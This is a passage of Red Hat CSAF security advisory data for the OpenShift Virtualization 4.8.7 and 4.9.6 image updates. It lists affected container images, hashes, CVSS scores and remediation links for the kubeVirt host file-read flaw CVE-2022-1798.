"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This advisory contains the following OpenShift Virtualization 4.8.7 images:\n\nRHEL-8-CNV-4.8\n\n==============\n\nvm-import-controller-container-v4.8.7-4\novs-cni-marker-container-v4.8.7-6\nvirt-cdi-apiserver-container-v4.8.7-4\nvirt-cdi-uploadserver-container-v4.8.7-4\nvirt-cdi-uploadproxy-container-v4.8.7-4\nvm-import-virtv2v-container-v4.8.7-4\nhostpath-provisioner-container-v4.8.7-4\novs-cni-plugin-container-v4.8.7-5\nbridge-marker-container-v4.8.7-5\nvirt-cdi-controller-container-v4.8.7-4\nnode-maintenance-operator-container-v4.8.7-4\ncluster-network-addons-operator-container-v4.8.7-5\ncnv-containernetworking-plugins-container-v4.8.7-5\nvirt-cdi-importer-container-v4.8.7-4\nvm-import-operator-container-v4.8.7-4\nkubemacpool-container-v4.8.7-5\nkubevirt-vmware-container-v4.8.7-4\nkubevirt-v2v-conversion-container-v4.8.7-4\nkubernetes-nmstate-handler-container-v4.8.7-5\nvirtio-win-container-v4.8.7-4\nkubevirt-ssp-operator-container-v4.8.7-3\nvirt-cdi-operator-container-v4.8.7-4\ncnv-must-gather-container-v4.8.7-4\nhyperconverged-cluster-operator-container-v4.8.7-4\nvirt-cdi-cloner-container-v4.8.7-4\nhostpath-provisioner-operator-container-v4.8.7-4\nhyperconverged-cluster-webhook-container-v4.8.7-4\nkubevirt-template-validator-container-v4.8.7-4\nvirt-handler-container-v4.8.7-5\nvirt-api-container-v4.8.7-5\nvirt-operator-container-v4.8.7-5\nvirt-launcher-container-v4.8.7-5\nvirt-controller-container-v4.8.7-5\nhco-bundle-registry-container-v4.8.7-28\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2022:6890",
"url": "https://access.redhat.com/errata/RHSA-2022:6890"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6890.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update",
"tracking": {
"current_release_date": "2024-11-22T18:27:58+00:00",
"generator": {
"date": "2024-11-22T18:27:58+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2022:6890",
"initial_release_date": "2022-10-11T16:02:33+00:00",
"revision_history": [
{
"date": "2022-10-11T16:02:33+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2022-10-11T16:02:33+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-22T18:27:58+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "CNV 4.8 for RHEL 8",
"product": {
"name": "CNV 4.8 for RHEL 8",
"product_id": "8Base-CNV-4.8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:container_native_virtualization:4.8::el8"
}
}
}
],
"category": "product_family",
"name": "OpenShift Virtualization"
},
{
"branches": [
{
"category": "product_version",
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64",
"product": {
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64",
"product_id": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8\u0026tag=v4.8.7-5"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64",
"product_id": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion\u0026tag=v4.8.7-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64",
"product_id": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware\u0026tag=v4.8.7-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64",
"product": {
"name": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64",
"product_id": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator\u0026tag=v4.8.7-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64",
"product": {
"name": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64",
"product_id": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8\u0026tag=v4.8.7-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64",
"product": {
"name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64",
"product_id": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8\u0026tag=v4.8.7-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64",
"product": {
"name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64",
"product_id": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8\u0026tag=v4.8.7-4"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64 as a component of CNV 4.8 for RHEL 8",
"product_id": "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64"
},
"product_reference": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64",
"relates_to_product_reference": "8Base-CNV-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64 as a component of CNV 4.8 for RHEL 8",
"product_id": "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64",
"relates_to_product_reference": "8Base-CNV-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64 as a component of CNV 4.8 for RHEL 8",
"product_id": "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64",
"relates_to_product_reference": "8Base-CNV-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64 as a component of CNV 4.8 for RHEL 8",
"product_id": "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64"
},
"product_reference": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64",
"relates_to_product_reference": "8Base-CNV-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64 as a component of CNV 4.8 for RHEL 8",
"product_id": "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64"
},
"product_reference": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64",
"relates_to_product_reference": "8Base-CNV-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64 as a component of CNV 4.8 for RHEL 8",
"product_id": "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64"
},
"product_reference": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64",
"relates_to_product_reference": "8Base-CNV-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64 as a component of CNV 4.8 for RHEL 8",
"product_id": "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64"
},
"product_reference": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64",
"relates_to_product_reference": "8Base-CNV-4.8"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Oliver Brooks and James Klopchic"
],
"organization": "NCC Group"
}
],
"cve": "CVE-2022-1798",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2022-08-12T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2117872"
}
],
"notes": [
{
"category": "description",
"text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64",
"8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64",
"8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64",
"8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-1798"
},
{
"category": "external",
"summary": "RHBZ#2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1798"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798"
},
{
"category": "external",
"summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm",
"url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"
}
],
"release_date": "2022-08-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-10-11T16:02:33+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64",
"8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64",
"8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64",
"8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6890"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64",
"8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64",
"8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64",
"8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64",
"8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs"
}
]
}
rhsa-2022_6681
Vulnerability from csaf_redhat
Published
2022-09-22 08:16
Modified
2024-11-22 18:27
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This advisory contains the following OpenShift Virtualization 4.9.6 images:
RHEL-8-CNV-4.9
==============
cnv-must-gather-container-v4.9.6-7
kubevirt-template-validator-container-v4.9.6-6
kubevirt-ssp-operator-container-v4.9.6-5
virt-cdi-uploadserver-container-v4.9.6-4
virt-cdi-cloner-container-v4.9.6-4
virt-cdi-importer-container-v4.9.6-4
virt-cdi-uploadproxy-container-v4.9.6-4
virt-cdi-apiserver-container-v4.9.6-4
virt-cdi-controller-container-v4.9.6-4
virt-cdi-operator-container-v4.9.6-4
hostpath-provisioner-container-v4.9.6-3
hyperconverged-cluster-webhook-container-v4.9.6-3
hyperconverged-cluster-operator-container-v4.9.6-3
node-maintenance-operator-container-v4.9.6-4
kubevirt-vmware-container-v4.9.6-3
kubevirt-v2v-conversion-container-v4.9.6-3
ovs-cni-plugin-container-v4.9.6-3
cnv-containernetworking-plugins-container-v4.9.6-3
bridge-marker-container-v4.9.6-4
ovs-cni-marker-container-v4.9.6-3
kubemacpool-container-v4.9.6-4
kubernetes-nmstate-handler-container-v4.9.6-5
cluster-network-addons-operator-container-v4.9.6-5
virt-controller-container-v4.9.6-9
virt-handler-container-v4.9.6-9
virt-api-container-v4.9.6-9
virt-operator-container-v4.9.6-9
virt-artifacts-server-container-v4.9.6-9
virt-launcher-container-v4.9.6-9
libguestfs-tools-container-v4.9.6-9
virtio-win-container-v4.9.6-3
hostpath-provisioner-operator-container-v4.9.6-3
vm-import-operator-container-v4.9.6-3
vm-import-controller-container-v4.9.6-3
vm-import-virtv2v-container-v4.9.6-3
hco-bundle-registry-container-v4.9.6-51
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This advisory contains the following OpenShift Virtualization 4.9.6 images:\n\nRHEL-8-CNV-4.9\n==============\ncnv-must-gather-container-v4.9.6-7\nkubevirt-template-validator-container-v4.9.6-6\nkubevirt-ssp-operator-container-v4.9.6-5\nvirt-cdi-uploadserver-container-v4.9.6-4\nvirt-cdi-cloner-container-v4.9.6-4\nvirt-cdi-importer-container-v4.9.6-4\nvirt-cdi-uploadproxy-container-v4.9.6-4\nvirt-cdi-apiserver-container-v4.9.6-4\nvirt-cdi-controller-container-v4.9.6-4\nvirt-cdi-operator-container-v4.9.6-4\nhostpath-provisioner-container-v4.9.6-3\nhyperconverged-cluster-webhook-container-v4.9.6-3\nhyperconverged-cluster-operator-container-v4.9.6-3\nnode-maintenance-operator-container-v4.9.6-4\nkubevirt-vmware-container-v4.9.6-3\nkubevirt-v2v-conversion-container-v4.9.6-3\novs-cni-plugin-container-v4.9.6-3\ncnv-containernetworking-plugins-container-v4.9.6-3\nbridge-marker-container-v4.9.6-4\novs-cni-marker-container-v4.9.6-3\nkubemacpool-container-v4.9.6-4\nkubernetes-nmstate-handler-container-v4.9.6-5\ncluster-network-addons-operator-container-v4.9.6-5\nvirt-controller-container-v4.9.6-9\nvirt-handler-container-v4.9.6-9\nvirt-api-container-v4.9.6-9\nvirt-operator-container-v4.9.6-9\nvirt-artifacts-server-container-v4.9.6-9\nvirt-launcher-container-v4.9.6-9\nlibguestfs-tools-container-v4.9.6-9\nvirtio-win-container-v4.9.6-3\nhostpath-provisioner-operator-container-v4.9.6-3\nvm-import-operator-container-v4.9.6-3\nvm-import-controller-container-v4.9.6-3\nvm-import-virtv2v-container-v4.9.6-3\nhco-bundle-registry-container-v4.9.6-51\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2022:6681",
"url": "https://access.redhat.com/errata/RHSA-2022:6681"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2092269",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092269"
},
{
"category": "external",
"summary": "2097313",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097313"
},
{
"category": "external",
"summary": "2101174",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101174"
},
{
"category": "external",
"summary": "2110783",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2110783"
},
{
"category": "external",
"summary": "2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "external",
"summary": "2118317",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2118317"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6681.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update",
"tracking": {
"current_release_date": "2024-11-22T18:27:44+00:00",
"generator": {
"date": "2024-11-22T18:27:44+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2022:6681",
"initial_release_date": "2022-09-22T08:16:30+00:00",
"revision_history": [
{
"date": "2022-09-22T08:16:30+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2022-09-22T08:16:30+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-22T18:27:44+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "CNV 4.9 for RHEL 8",
"product": {
"name": "CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:container_native_virtualization:4.9::el8"
}
}
}
],
"category": "product_family",
"name": "OpenShift Virtualization"
},
{
"branches": [
{
"category": "product_version",
"name": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64",
"product": {
"name": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64",
"product_id": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64",
"product_identification_helper": {
